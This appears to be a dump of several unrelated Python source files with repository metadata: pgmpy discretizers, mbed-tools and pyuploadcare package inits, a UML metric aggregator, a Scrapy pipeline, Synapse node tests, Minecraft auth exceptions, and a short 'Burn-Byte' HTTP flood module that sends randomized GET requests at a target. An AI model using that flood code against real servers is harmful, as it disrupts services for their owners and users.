['x=-3.0', 'x=-2.4', 'x=-1.8', 'x=-1.2', 'x=-0.6', 'x=0.0', 'x=0.6', 'x=1.2', 'x=1.8', 'x=2.4']
"""
def __init__(self, factor, low, high, cardinality):
self.factor = factor
self.low = low
self.high = high
self.cardinality = cardinality
@abstractmethod
def get_discrete_values(self):
"""
This method implements the algorithm to discretize the given
continuous distribution.
It must be implemented by all the subclasses of BaseDiscretizer.
Returns
-------
A list of discrete values or a DiscreteFactor object.
"""
pass
def get_labels(self):
"""
Returns a list of strings representing the values about
which the discretization method calculates the probability
masses.
Default value is the points -
[low, low+step, low+2*step, ......... , high-step]
unless the method is overridden by a subclass.
Examples
--------
>>> from pgmpy.factors import ContinuousNode
>>> from pgmpy.discretize import BaseDiscretizer
>>> class ChildDiscretizer(BaseDiscretizer):
... def get_discrete_values(self):
... pass
>>> from scipy.stats import norm
>>> node = ContinuousNode(norm(0).pdf)
>>> child = ChildDiscretizer(node, -5, 5, 20)
        >>> child.get_labels()
['x=-5.0', 'x=-4.5', 'x=-4.0', 'x=-3.5', 'x=-3.0', 'x=-2.5',
'x=-2.0', 'x=-1.5', 'x=-1.0', 'x=-0.5', 'x=0.0', 'x=0.5', 'x=1.0',
'x=1.5', 'x=2.0', 'x=2.5', 'x=3.0', 'x=3.5', 'x=4.0', 'x=4.5']
"""
step = (self.high - self.low) / self.cardinality
labels = [
"x={i}".format(i=str(i))
for i in np.round(np.arange(self.low, self.high, step), 3)
]
return labels
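# The concrete discretizers below only implement get_discrete_values(); the
# grid points and their labels come from BaseDiscretizer.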
class RoundingDiscretizer(BaseDiscretizer):
"""
This class uses the rounding method for discretizing the
given continuous distribution.
For the rounding method,
The probability mass is,
cdf(x+step/2)-cdf(x), for x = low
cdf(x+step/2)-cdf(x-step/2), for low < x <= high
where, cdf is the cumulative density function of the distribution
and step = (high-low)/cardinality.
Examples
--------
>>> import numpy as np
>>> from pgmpy.factors.continuous import ContinuousNode
>>> from pgmpy.factors.continuous import RoundingDiscretizer
>>> std_normal_pdf = lambda x : np.exp(-x*x/2) / (np.sqrt(2*np.pi))
>>> std_normal = ContinuousNode(std_normal_pdf)
>>> std_normal.discretize(RoundingDiscretizer, low=-3, high=3,
... cardinality=12)
[0.001629865203424451, 0.009244709419989363, 0.027834684208773178,
0.065590616803038182, 0.120977578710013, 0.17466632194020804,
0.19741265136584729, 0.17466632194020937, 0.12097757871001302,
0.065590616803036905, 0.027834684208772664, 0.0092447094199902269]
"""
def get_discrete_values(self):
step = (self.high - self.low) / self.cardinality
# for x=[low]
discrete_values = [
self.factor.cdf(self.low + step / 2) - self.factor.cdf(self.low)
]
# for x=[low+step, low+2*step, ........., high-step]
points = np.linspace(self.low + step, self.high - step, self.cardinality - 1)
discrete_values.extend(
[
self.factor.cdf(i + step / 2) - self.factor.cdf(i - step / 2)
for i in points
]
)
return discrete_values
class UnbiasedDiscretizer(BaseDiscretizer):
"""
This class uses the unbiased method for discretizing the
given continuous distribution.
The unbiased method for discretization is the matching of the
first moment method. It involves calculating the first order
limited moment of the distribution which is done by the _lim_moment
method.
For this method,
The probability mass is,
(E(x) - E(x + step))/step + 1 - cdf(x), for x = low
(2 * E(x) - E(x - step) - E(x + step))/step, for low < x < high
(E(x) - E(x - step))/step - 1 + cdf(x), for x = high
where, E(x) is the first limiting moment of the distribution
about the point x, cdf is the cumulative density function
and step = (high-low)/cardinality.
References
----------
Klugman, S. A., Panjer, H. H. and Willmot, G. E.,
Loss Models, From Data to Decisions, Fourth Edition,
Wiley, section 9.6.5.2 (Method of local moment matching) and
exercise 9.41.
Examples
--------
>>> import numpy as np
>>> from pgmpy.factors import ContinuousNode
>>> from pgmpy.factors.continuous import UnbiasedDiscretizer
# exponential distribution with rate = 2
>>> exp_pdf = lambda x: 2*np.exp(-2*x) if x>=0 else 0
>>> exp_node = ContinuousNode(exp_pdf)
>>> exp_node.discretize(UnbiasedDiscretizer, low=0, high=5, cardinality=10)
[0.39627368905806137, 0.4049838434034298, 0.13331784003148325,
0.043887287876647259, 0.014447413395300212, 0.0047559685431339703,
0.0015656350182896128, 0.00051540201980112557, 0.00016965346326140994,
3.7867260839208328e-05]
"""
def get_discrete_values(self):
lev = self._lim_moment
step = (self.high - self.low) / (self.cardinality - 1)
# for x=[low]
discrete_values = [
(lev(self.low) - lev(self.low + step)) / step
+ 1
- self.factor.cdf(self.low)
]
# for x=[low+step, low+2*step, ........., high-step]
points = np.linspace(self.low + step, self.high - step, self.cardinality - 2)
discrete_values.extend(
[(2 * lev(i) - lev(i - step) - lev(i + step)) / step for i in points]
)
# for x=[high]
discrete_values.append(
(lev(self.high) - lev(self.high - step)) / step
- 1
+ self.factor.cdf(self.high)
)
return discrete_values
def _lim_moment(self, u, order=1):
"""
This method calculates the kth order limiting moment of
the distribution. It is given by -
E(u) = Integral (-inf to u) [ (x^k)*pdf(x) dx ] + (u^k)(1-cdf(u))
where, pdf is the probability density function and cdf is the
cumulative density function of the distribution.
Reference
---------
Klugman, S. A., Panjer, H. H. and Willmot, G. E.,
Loss Models, From Data to Decisions, Fourth Edition,
Wiley, definition 3.5 and equation 3.8.
Parameters
----------
u: float
The point at which the moment is to be calculated.
order: int
The order of the moment, default is first order.
"""
def fun(x):
return np.power(x, order) * self.factor.pdf(x)
return integrate.quad(fun, -np.inf, u)[0] + np.power(u, order) * (
1 - self.factor.cdf(u)
)
def get_labels(self):
labels = list(
"x={i}".format(i=str(i))
for i in np.round(np.linspace(self.low, self.high, self.cardinality), 3)
)
return labels
| 32.592308 | 99 | 0.597829 |
4a25a754bcb7ee057441f2dacb1c8ee698b8f6c4 | 165 | py | Python | src/mbed_tools/sterm/__init__.py | cyliangtw/mbed-tools | 69c600c0a5ac1eb0d52b481b5ba020da8bb73d33 | [
"Apache-2.0"
] | 39 | 2020-04-03T13:52:34.000Z | 2022-03-23T13:08:22.000Z | src/mbed_tools/sterm/__init__.py | cyliangtw/mbed-tools | 69c600c0a5ac1eb0d52b481b5ba020da8bb73d33 | [
"Apache-2.0"
] | 306 | 2020-02-06T18:08:43.000Z | 2022-03-25T14:50:18.000Z | src/mbed_tools/sterm/__init__.py | cyliangtw/mbed-tools | 69c600c0a5ac1eb0d52b481b5ba020da8bb73d33 | [
"Apache-2.0"
] | 23 | 2020-03-17T11:42:23.000Z | 2022-01-30T02:56:18.000Z |
#
# Copyright (c) 2020-2021 Arm Limited and Contributors. All rights reserved.
# SPDX-License-Identifier: Apache-2.0
#
"""Package containing sterm functionality."""
| 27.5 | 76 | 0.751515 |
4a25a7f3a81c5d9e118d139427e3b5dc5ba1f135 | 2,567 | py | Python | app/metric/aggregator.py | IvanoBilenchi/umlens | 7d0c621038209567ad6b8df5e6f14f413d417f22 | [
"MIT"
] | null | null | null | app/metric/aggregator.py | IvanoBilenchi/umlens | 7d0c621038209567ad6b8df5e6f14f413d417f22 | [
"MIT"
] | null | null | null | app/metric/aggregator.py | IvanoBilenchi/umlens | 7d0c621038209567ad6b8df5e6f14f413d417f22 | [
"MIT"
] | 1 | 2020-12-01T10:49:03.000Z | 2020-12-01T10:49:03.000Z |
from typing import Dict, List, Optional, Type
from app.cycle.finder import CycleFinder
from app.pattern.finder import PatternFinder
from app.uml.model import Diagram
from app.util.decorators import memoized
from .model import (
AvgInheritanceDepth, AvgMethodsPerClass, AvgRelationshipsPerClass, Classes, ClassesInCycle,
ClassesInCycleRatio, ClassesInPattern, ClassesInPatternRatio, ComputedMetric, DependencyCycles,
DevelopmentCost, MethodInstances, Metric, Packages, PatternTypes, RelationshipInstances,
RemediationCost, TechnicalDebtRatio
)
class MetricAggregator:
def __init__(self, diagram: Diagram, cycle_finder: CycleFinder, pattern_finder: PatternFinder,
config: Optional[Dict] = None):
self._diag = diagram
self._cfinder = cycle_finder
self._pfinder = pattern_finder
self._config = config
def compute_metrics(self) -> List[Metric]:
metrics = self._base_metrics().copy()
metrics.append(self._development_cost())
metrics.append(self._remediation_cost())
metrics.append(self._technical_debt_ratio())
return metrics
@memoized
def _computed_metric(self, mtype: Type[ComputedMetric]) -> ComputedMetric:
return mtype(self._diag, self._cfinder, self._pfinder)
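    # The computed metrics are built once and memoized; each ratio metric
    # below is then derived from a (numerator, denominator) pair of them.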
@memoized
def _base_metrics(self) -> List[Metric]:
metrics = [self._computed_metric(mtype)
for mtype in (Packages, Classes, PatternTypes, ClassesInPattern,
MethodInstances, RelationshipInstances, AvgInheritanceDepth,
DependencyCycles, ClassesInCycle)]
for mtype, num, den in (
(ClassesInPatternRatio, ClassesInPattern, Classes),
(AvgMethodsPerClass, MethodInstances, Classes),
(AvgRelationshipsPerClass, RelationshipInstances, Classes),
(ClassesInCycleRatio, ClassesInCycle, Classes)
):
metrics.append(mtype(self._computed_metric(num), self._computed_metric(den)))
return metrics
def _remediation_cost(self) -> RemediationCost:
return RemediationCost([(m, self._config[m.identifier])
for m in self._base_metrics() if m.identifier in self._config])
def _development_cost(self) -> DevelopmentCost:
return DevelopmentCost(self._config.get(DevelopmentCost.id(), 0.0))
def _technical_debt_ratio(self) -> TechnicalDebtRatio:
return TechnicalDebtRatio(self._remediation_cost(), self._development_cost())
| 42.081967 | 99 | 0.691858 |
4a25a96badd47db09f10e307b6c2c119edb9be64 | 627 | py | Python | virtual/lib/python3.8/site-packages/pyuploadcare/__init__.py | Carolwanzuu/The_Awwward | 37e4a49bd15e5db320d1940aac346fd1bb939113 | [
"MIT"
] | 1 | 2021-01-31T09:33:34.000Z | 2021-01-31T09:33:34.000Z | virtual/lib/python3.8/site-packages/pyuploadcare/__init__.py | AokoMercyline/E-commerce | 833ad9fd5777e35146dfccf809e78e3c94d997a8 | [
"MIT"
] | 8 | 2021-03-19T11:24:02.000Z | 2022-03-12T00:34:31.000Z | virtual/lib/python3.8/site-packages/pyuploadcare/__init__.py | AokoMercyline/E-commerce | 833ad9fd5777e35146dfccf809e78e3c94d997a8 | [
"MIT"
] | 1 | 2020-11-04T08:35:12.000Z | 2020-11-04T08:35:12.000Z |
# coding: utf-8
"""
PyUploadcare: a Python library for Uploadcare
Usage example::
>>> import pyuploadcare
>>> pyuploadcare.conf.pub_key = 'demopublickey'
>>> pyuploadcare.conf.secret = 'demoprivatekey'
>>> file_ = pyuploadcare.File('6c5e9526-b0fe-4739-8975-72e8d5ee6342')
>>> file_.cdn_url
https://ucarecdn.com/6c5e9526-b0fe-4739-8975-72e8d5ee6342/
"""
from __future__ import unicode_literals
__version__ = '2.7.0'
from .api_resources import File, FileList, FileGroup
from .exceptions import (
UploadcareException, APIConnectionError, AuthenticationError, APIError,
InvalidRequestError,
)
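# Minimal usage sketch, assuming it is run as a script; the UUID is the demo
# file id from the docstring above and the keys are Uploadcare's public demo
# credentials.
if __name__ == '__main__':
    from pyuploadcare import conf
    conf.pub_key = 'demopublickey'
    conf.secret = 'demoprivatekey'
    try:
        print(File('6c5e9526-b0fe-4739-8975-72e8d5ee6342').cdn_url)
    except UploadcareException as exc:
        print('Uploadcare call failed:', exc)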
| 25.08 | 75 | 0.735247 |
4a25aaac8f4e4abe457ee339dc3fe684590eaf30 | 809 | py | Python | xepacrawler/xepacrawler/pipelines.py | jpchagas/xepa-crawler | 9f80418a1a8e1d21fdf00e2cf3fc5c6ac9e40d9b | [
"Apache-2.0"
] | null | null | null | xepacrawler/xepacrawler/pipelines.py | jpchagas/xepa-crawler | 9f80418a1a8e1d21fdf00e2cf3fc5c6ac9e40d9b | [
"Apache-2.0"
] | null | null | null | xepacrawler/xepacrawler/pipelines.py | jpchagas/xepa-crawler | 9f80418a1a8e1d21fdf00e2cf3fc5c6ac9e40d9b | [
"Apache-2.0"
] | null | null | null | import requests
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html
# useful for handling different item types with a single interface
class XepacrawlerPipeline:
def process_item(self, item, spider):
payload = {'release_date':item['data'][0],
'product':item['produto'][0],
'unit':item['unidade'][0],
'max_value':item['maximo'][0],
'frequent_value':item['frequente'][0],
'min_value':item['minimo'][0]}
requests.post('https://xepa.herokuapp.com/price', json=payload)
#requests.post('http://127.0.0.1:5000/price', json=payload)
return item
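# As noted in the header comment, the pipeline must be registered in the
# project's settings.py before Scrapy will call it; the priority value 300
# below is the conventional default, not a project-specific choice:
#
# ITEM_PIPELINES = {
#     'xepacrawler.pipelines.XepacrawlerPipeline': 300,
# }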
| 36.772727 | 71 | 0.599506 |
4a25aae7da9d1c933474ab73cc88f48e84bb2b08 | 17,761 | py | Python | synapse/tests/test_lib_node.py | kcreyts/synapse | fe740fd1e0febfa32f8d431b32ab48f8a0cf306e | [
"Apache-2.0"
] | 1 | 2021-02-15T22:07:05.000Z | 2021-02-15T22:07:05.000Z | synapse/tests/test_lib_node.py | kcreyts/synapse | fe740fd1e0febfa32f8d431b32ab48f8a0cf306e | [
"Apache-2.0"
] | null | null | null | synapse/tests/test_lib_node.py | kcreyts/synapse | fe740fd1e0febfa32f8d431b32ab48f8a0cf306e | [
"Apache-2.0"
] | null | null | null | import collections
import synapse.exc as s_exc
import synapse.common as s_common
import synapse.lib.node as s_node
import synapse.tests.utils as s_t_utils
from synapse.tests.utils import alist
class NodeTest(s_t_utils.SynTest):
async def test_pack(self):
form = 'test:str'
valu = 'cool'
props = {'tick': 12345}
async with self.getTestCore() as core:
await core.addTagProp('score', ('int', {}), {})
await core.addTagProp('note', ('str', {'lower': True, 'strip': 'True'}), {})
async with await core.snap() as snap:
node = await snap.addNode(form, valu, props=props)
await node.setTagProp('foo', 'score', 10)
await node.setTagProp('foo', 'note', " This is a really cool tag! ")
iden, info = node.pack()
self.eq(iden, ('test:str', 'cool'))
self.eq(info.get('tags'), {'foo': (None, None)})
self.eq(info.get('tagprops'), {'foo': {'score': 10, 'note': 'this is a really cool tag!'}})
props = {k: v for (k, v) in info.get('props', {}).items() if not k.startswith('.')}
self.eq(props, {'tick': 12345})
iden, info = node.pack(dorepr=True)
self.eq(iden, ('test:str', 'cool'))
self.eq(info.get('tags'), {'foo': (None, None)})
props = {k: v for (k, v) in info.get('props', {}).items() if not k.startswith('.')}
self.eq(props, {'tick': 12345})
self.eq(info.get('repr'), None)
reprs = {k: v for (k, v) in info.get('reprs', {}).items() if not k.startswith('.')}
self.eq(reprs, {'tick': '1970/01/01 00:00:12.345'})
tagpropreprs = info.get('tagpropreprs')
self.eq(tagpropreprs, {'foo': {'score': '10'}})
            # Set a property on the node which is not in the model and pack it.
            # This situation can be encountered in a multi-layer setup where
            # one Cortex has model knowledge and sets props, and another
            # Cortex (sitting on top of the first one) lifts a node which has
            # props the second Cortex doesn't know about.
node.props['.newp'] = 1
node.props['newp'] = (2, 3)
node.tagprops[('foo', 'valu')] = 10
iden, info = node.pack(dorepr=True)
props, reprs = info.get('props'), info.get('reprs')
tagprops, tagpropreprs = info.get('tagprops'), info.get('tagpropreprs')
self.eq(props.get('.newp'), 1)
self.eq(props.get('newp'), (2, 3))
self.eq(tagprops, {'foo': {'score': 10, 'note': 'this is a really cool tag!', 'valu': 10}})
# without model knowledge it is impossible to repr a value so it should
# *not* be in the repr dict
self.none(reprs.get('newp'))
self.none(reprs.get('.newp'))
self.eq(tagpropreprs, {'foo': {'score': '10'}})
async def test_set(self):
form = 'test:str'
valu = 'cool'
props = {'tick': 12345}
async with self.getTestCore() as core:
async with await core.snap() as snap:
self.true(snap.strict) # Following assertions based on snap.strict being true
node = await snap.addNode(form, valu, props=props)
self.false(await node.set('tick', 12345))
self.true(await node.set('tick', 123456))
await self.asyncraises(s_exc.NoSuchProp, node.set('notreal', 12345))
ronode = await snap.addNode('test:comp', (1, 's'))
await self.asyncraises(s_exc.ReadOnlyProp, ronode.set('hehe', 2))
snap.strict = False
self.false(await ronode.set('hehe', 3))
snap.strict = True
async def test_has(self):
form = 'test:str'
valu = 'cool'
props = {'tick': 12345}
async with self.getTestCore() as core:
async with await core.snap() as snap:
node = await snap.addNode(form, valu, props=props)
self.true(node.has('tick'))
self.true(node.has('.created'))
self.false(node.has('nope'))
self.false(node.has('.nope'))
async def test_get(self):
form = 'test:str'
valu = 'cool'
props = {'tick': 12345}
async with self.getTestCore() as core:
async with await core.snap() as snap:
node = await snap.addNode(form, valu, props=props)
await node.addTag('cool', valu=(1, 2))
self.eq(node.get('tick'), 12345)
self.none(node.get('nope'))
self.eq(node.get('#cool'), (1, 2))
self.none(node.get('#newp'))
async def test_pop(self):
form = 'test:str'
valu = 'cool'
props = {'tick': 12345}
async with self.getTestCore() as core:
async with await core.snap() as snap:
node = await snap.addNode(form, valu, props=props)
await node.addTag('cool', valu=(1, 2))
await self.asyncraises(s_exc.NoSuchProp, node.pop('nope'))
snap.strict = False
self.false(await node.pop('nope'))
snap.strict = True
ronode = await snap.addNode('test:comp', (1, 's'))
await self.asyncraises(s_exc.ReadOnlyProp, ronode.pop('hehe'))
snap.strict = False
self.false(await ronode.pop('hehe'))
snap.strict = True
async def test_repr(self):
async with self.getTestCore() as core:
async with await core.snap() as snap:
form = 'test:str'
valu = 'cool'
props = {'tick': 12345}
node = await snap.addNode(form, valu, props=props)
self.eq('cool', node.repr())
self.eq(node.repr('tick'), '1970/01/01 00:00:12.345')
form = 'test:threetype'
valu = 'cool'
node = await snap.addNode(form, valu)
self.eq(node.repr(), '3')
reprs = {k: v for (k, v) in node.reprs().items() if not k.startswith('.')}
self.eq(reprs.get('three'), '3')
async def test_tags(self):
form = 'test:str'
valu = 'cool'
props = {'tick': 12345}
async with self.getTestCore() as core:
async with await core.snap() as snap:
self.true(snap.strict)
node = await snap.addNode(form, valu, props=props)
# Add a tag
await node.addTag('cool', valu=(1, 2))
self.eq(node.getTag('cool'), (1, 2))
await node.addTag('cool', valu=(1, 2)) # Add again
self.eq(node.getTag('cool'), (1, 2))
await node.addTag('cool', valu=(1, 3)) # Add again with different valu
self.eq(node.getTag('cool'), (1, 3))
await node.addTag('cool', valu=(-5, 0)) # Add again with different valu
self.eq(node.getTag('cool'), (-5, 3)) # merges...
self.true(node.hasTag('cool'))
self.true(node.hasTag('#cool'))
self.false(node.hasTag('notcool'))
self.false(node.hasTag('#notcool'))
# Demonstrate that valu is only applied at the level that addTag is called
await node.addTag('cool.beans.abc', valu=(1, 8))
self.eq(node.getTag('cool.beans.abc'), (1, 8))
self.eq(node.getTag('cool.beans'), (None, None))
await self.asyncraises(s_exc.NoSuchProp, node.pop('nope'))
snap.strict = False
self.false(await node.pop('nope'))
snap.strict = True
async def test_helpers(self):
form = 'test:str'
valu = 'cool'
props = {'tick': 12345,
'hehe': 'hehe',
}
tval = (None, None)
async with self.getTestCore() as core:
await core.addTagProp('score', ('int', {}), {})
await core.addTagProp('note', ('str', {'lower': True, 'strip': 'True'}), {})
async with await core.snap() as snap:
node = await snap.addNode(form, valu, props=props)
await node.addTag('test.foo.bar.duck', tval)
await node.addTag('test.foo.baz', tval)
await node.addTag('test.foo.time', ('2016', '2019'))
await node.addTag('test.foo', ('2015', '2017'))
await node.setTagProp('test', 'score', 0)
await node.setTagProp('test', 'note', 'Words')
pode = node.pack(dorepr=True)
node2 = await snap.addNode('test:int', '1234')
pode2 = node2.pack(dorepr=True)
self.eq(s_node.ndef(pode), ('test:str', 'cool'))
self.eq(s_node.reprNdef(pode), ('test:str', 'cool'))
self.eq(s_node.ndef(pode2), ('test:int', 1234))
self.eq(s_node.reprNdef(pode2), ('test:int', '1234'))
e = 'bf1198c5f28dae61d595434b0788dd6f7206b1e62d06b0798e012685f1abc85d'
self.eq(s_node.iden(pode), e)
self.true(s_node.tagged(pode, 'test'))
self.true(s_node.tagged(pode, '#test.foo.bar'))
self.true(s_node.tagged(pode, 'test.foo.bar.duck'))
self.false(s_node.tagged(pode, 'test.foo.bar.newp'))
self.len(3, s_node.tags(pode, leaf=True))
self.len(5, s_node.tagsnice(pode))
self.len(6, s_node.tags(pode))
self.eq(s_node.reprTag(pode, '#test.foo.bar'), '')
self.eq(s_node.reprTag(pode, '#test.foo.time'), '(2016/01/01 00:00:00.000, 2019/01/01 00:00:00.000)')
self.none(s_node.reprTag(pode, 'test.foo.newp'))
self.eq(s_node.prop(pode, 'hehe'), 'hehe')
self.eq(s_node.prop(pode, 'tick'), 12345)
self.eq(s_node.prop(pode, ':tick'), 12345)
self.eq(s_node.prop(pode, 'test:str:tick'), 12345)
self.none(s_node.prop(pode, 'newp'))
self.eq(s_node.reprProp(pode, 'hehe'), 'hehe')
self.eq(s_node.reprProp(pode, 'tick'), '1970/01/01 00:00:12.345')
self.eq(s_node.reprProp(pode, ':tick'), '1970/01/01 00:00:12.345')
self.eq(s_node.reprProp(pode, 'test:str:tick'), '1970/01/01 00:00:12.345')
self.none(s_node.reprProp(pode, 'newp'))
self.eq(s_node.reprTagProps(pode, 'test'),
[('note', 'words'), ('score', '0')])
self.eq(s_node.reprTagProps(pode, 'newp'), [])
self.eq(s_node.reprTagProps(pode, 'test.foo'), [])
props = s_node.props(pode)
self.isin('.created', props)
self.isin('tick', props)
self.notin('newp', props)
async def test_storm(self):
async with self.getTestCore() as core:
async with await core.snap() as snap:
query = snap.core.getStormQuery('')
with snap.getStormRuntime(query) as runt:
node = await snap.addNode('test:comp', (42, 'lol'))
nodepaths = await alist(node.storm(runt, '-> test:int'))
self.len(1, nodepaths)
self.eq(nodepaths[0][0].ndef, ('test:int', 42))
nodepaths = await alist(node.storm(runt, '-> test:int [:loc=$foo]', opts={'vars': {'foo': 'us'}}))
self.eq(nodepaths[0][0].props.get('loc'), 'us')
path = nodepaths[0][1].fork(node) # type: s_node.Path
path.vars['zed'] = 'ca'
# Path present, opts not present
nodes = await alist(node.storm(runt, '-> test:int [:loc=$zed] $bar=$foo', path=path))
self.eq(nodes[0][0].props.get('loc'), 'ca')
# path is not updated due to frame scope
self.none(path.vars.get('bar'), 'us')
# Path present, opts present but no opts['vars']
nodes = await alist(node.storm(runt, '-> test:int [:loc=$zed] $bar=$foo', opts={}, path=path))
self.eq(nodes[0][0].props.get('loc'), 'ca')
# path is not updated due to frame scope
self.none(path.vars.get('bar'))
# Path present, opts present with vars
nodes = await alist(node.storm(runt, '-> test:int [:loc=$zed] $bar=$baz',
opts={'vars': {'baz': 'ru'}},
path=path))
self.eq(nodes[0][0].props.get('loc'), 'ca')
# path is not updated due to frame scope
self.none(path.vars.get('bar'))
# Path can push / pop vars in frames
self.eq(path.getVar('key'), s_common.novalu)
self.len(0, path.frames)
path.initframe({'key': 'valu'})
self.len(1, path.frames)
self.eq(path.getVar('key'), 'valu')
path.finiframe()
self.len(0, path.frames)
self.eq(path.getVar('key'), s_common.novalu)
# Path can push / pop a runt as well
# This example is *just* a test example to show the variable movement,
                    # not actual runtime movement.
path.initframe({'key': 'valu'})
self.eq(path.getVar('key'), 'valu')
path.finiframe()
self.eq(path.getVar('key'), s_common.novalu)
# Path clone() creates a fully independent Path object
pcln = path.clone()
# Ensure that path vars are independent
pcln.setVar('bar', 'us')
self.eq(pcln.getVar('bar'), 'us')
self.eq(path.getVar('bar'), s_common.novalu)
# Ensure the path nodes are independent
self.eq(len(pcln.nodes), len(path.nodes))
pcln.nodes.pop(-1)
self.ne(len(pcln.nodes), len(path.nodes))
# push a frame and clone it - ensure clone mods do not
# modify the original path
path.initframe({'key': 'valu'})
self.len(1, path.frames)
pcln = path.clone()
self.len(1, pcln.frames)
self.eq(path.getVar('key'), 'valu')
self.eq(pcln.getVar('key'), 'valu')
pcln.finiframe()
path.finiframe()
pcln.setVar('bar', 'us')
self.eq(pcln.getVar('bar'), 'us')
self.eq(path.getVar('bar'), s_common.novalu)
self.eq(pcln.getVar('key'), s_common.novalu)
self.eq(path.getVar('key'), s_common.novalu)
# Check that finiframe without frames resets vars
path.finiframe()
self.len(0, path.frames)
self.eq(s_common.novalu, path.getVar('bar'))
# Ensure that path clone() behavior in storm is as expected
# with a real-world style test..
async with self.getTestCore() as core:
await core.nodes('[test:int=1 test:int=2]')
q = '''test:int
$x = $node.value()
for $var in (1, 2) { } // The forloop here is used as a node multiplier
$x = $( $x + 1 )
$lib.fire(test, valu=$node.value(), x=$x)
-test:int'''
msgs = await core.stormlist(q)
data = collections.defaultdict(set)
for m in msgs:
if m[0] == 'storm:fire':
for k, v in m[1].get('data').items():
data[k].add(v)
self.eq(dict(data),
{'valu': {1, 2}, 'x': {2, 3}})
async def test_node_repr(self):
async with self.getTestCore() as core:
nodes = await core.nodes('[ inet:ipv4=1.2.3.4 :loc=us ]')
self.len(1, nodes)
node = nodes[0]
self.eq('1.2.3.4', nodes[0].repr())
self.eq('us', node.repr('loc'))
with self.raises(s_exc.NoSuchProp):
node.repr('newp')
self.none(node.repr('dns:rev'))
async def test_node_data(self):
async with self.getTestCore() as core:
nodes = await core.nodes('[ inet:ipv4=1.2.3.4 :loc=us ]')
self.len(1, nodes)
node = nodes[0]
self.none(await node.getData('foo'))
await node.setData('foo', 123)
self.eq(123, await node.getData('foo'))
await node.setData('foo', 123)
self.eq(123, await node.getData('foo'))
await node.setData('bar', (4, 5, 6))
self.eq((4, 5, 6), await node.getData('bar'))
self.eq(123, await node.getData('foo'))
self.eq([('foo', 123), ('bar', (4, 5, 6))], await alist(node.iterData()))
self.eq(123, await node.popData('foo'))
self.none(await node.getData('foo'))
self.none(await node.popData('foo'))
self.eq((4, 5, 6), await node.getData('bar'))
await node.delete()
nodes = await core.nodes('[ inet:ipv4=1.2.3.4 :loc=us ]')
node = nodes[0]
self.none(await node.getData('foo'))
self.none(await node.getData('bar'))
| 42.592326 | 118 | 0.500084 |
4a25ab120d21b4f40dca2116ee4f958e505340f6 | 1,213 | py | Python | bin/attacks/http.py | R3tr074/Burn-Byte | 6e82aa2d38460ffc299c387a652a1441aef49240 | [
"CC0-1.0"
] | 50 | 2020-10-04T07:25:35.000Z | 2022-02-24T03:52:16.000Z | bin/attacks/http.py | R3tr074/Burn-Byte | 6e82aa2d38460ffc299c387a652a1441aef49240 | [
"CC0-1.0"
] | 4 | 2021-06-08T13:17:18.000Z | 2022-01-13T13:37:37.000Z | bin/attacks/http.py | R3tr074/Burn-Byte | 6e82aa2d38460ffc299c387a652a1441aef49240 | [
"CC0-1.0"
] | 4 | 2020-10-05T02:32:06.000Z | 2021-01-31T23:25:47.000Z | import random
import requests
from rich.console import Console
from bin.addons.utils import random_useragent
# Define styled print
print = Console().print
red = "red3"
green = "green1"
yellow = "yellow1"
# Load user agents
user_agents = []
for _ in range(30):
user_agents.append(random_useragent())
# Headers
headers = {
"X-Requested-With": "XMLHttpRequest",
"Connection": "keep-alive",
"Pragma": "no-cache",
"Cache-Control": "no-cache",
"Accept-Encoding": "gzip, deflate, br",
"User-agent": random.choice(user_agents),
}
def flood(target):
payload = str(random._urandom(random.randint(10, 150)))
try:
r = requests.get(
f"http://{target[0]}", params=payload, headers=headers, timeout=4
)
except requests.exceptions.ConnectTimeout:
print(f"[{red} bold]✘ ERROR [/{red} bold][{yellow}]Timed out[/{yellow}]")
    except Exception as e:
        print(
            f"[{red} bold]✘ ERROR [/{red} bold] [{yellow}]While sending GET request: {e}[/{yellow}]"
        )
else:
print(
f"[{green} bold][{r.status_code}][/{green} bold]"
+ f"[{yellow}]Request sent! Payload size: {len(payload)}[/{yellow}]"
)
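# Illustrative call: target is indexed as target[0] above, so a
# (host, port)-style tuple works; the hostname below is a placeholder,
# not a real target.
if __name__ == '__main__':
    flood(('example.com', 80))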
| 26.369565 | 95 | 0.61418 |
4a25abfefd2253de7451fa0682a7cba285780063 | 2,914 | py | Python | src/networking/auth/exceptions.py | ca1f/mcidle-python | 53f3ce3644f46ee28ea7dc2199ad8ac9d44f1ef5 | [
"MIT"
] | 35 | 2018-12-04T14:54:00.000Z | 2021-12-12T21:09:12.000Z | src/networking/auth/exceptions.py | ca1f/mcidle-python | 53f3ce3644f46ee28ea7dc2199ad8ac9d44f1ef5 | [
"MIT"
] | 7 | 2019-03-05T21:55:28.000Z | 2021-03-07T23:06:50.000Z | src/networking/auth/exceptions.py | ca1f/mcidle-python | 53f3ce3644f46ee28ea7dc2199ad8ac9d44f1ef5 | [
"MIT"
] | 9 | 2019-06-17T03:05:56.000Z | 2020-10-23T10:21:58.000Z | """ Boilerplate from https://github.com/ammaraskar/pyCraft/blob/master/minecraft/exceptions.py """
class YggdrasilError(Exception):
"""
Base `Exception` for the Yggdrasil authentication service.
:param str message: A human-readable string representation of the error.
:param int status_code: Initial value of :attr:`status_code`.
:param str yggdrasil_error: Initial value of :attr:`yggdrasil_error`.
:param str yggdrasil_message: Initial value of :attr:`yggdrasil_message`.
:param str yggdrasil_cause: Initial value of :attr:`yggdrasil_cause`.
"""
def __init__(
self,
message=None,
status_code=None,
yggdrasil_error=None,
yggdrasil_message=None,
yggdrasil_cause=None,
):
super(YggdrasilError, self).__init__(message)
self.status_code = status_code
self.yggdrasil_error = yggdrasil_error
self.yggdrasil_message = yggdrasil_message
self.yggdrasil_cause = yggdrasil_cause
status_code = None
"""`int` or `None`. The associated HTTP status code. May be set."""
yggdrasil_error = None
"""`str` or `None`. The `"error"` field of the Yggdrasil response: a short
description such as `"Method Not Allowed"` or
`"ForbiddenOperationException"`. May be set.
"""
yggdrasil_message = None
"""`str` or `None`. The `"errorMessage"` field of the Yggdrasil response:
a longer description such as `"Invalid credentials. Invalid username or
password."`. May be set.
"""
yggdrasil_cause = None
"""`str` or `None`. The `"cause"` field of the Yggdrasil response: a string
containing additional information about the error. May be set.
"""
class ConnectionFailure(Exception):
"""Raised by 'minecraft.networking.Connection' when a connection attempt
fails.
"""
class VersionMismatch(ConnectionFailure):
"""Raised by 'minecraft.networking.Connection' when connection is not
possible due to a difference between the server's and client's
supported protocol versions.
"""
class LoginDisconnect(ConnectionFailure):
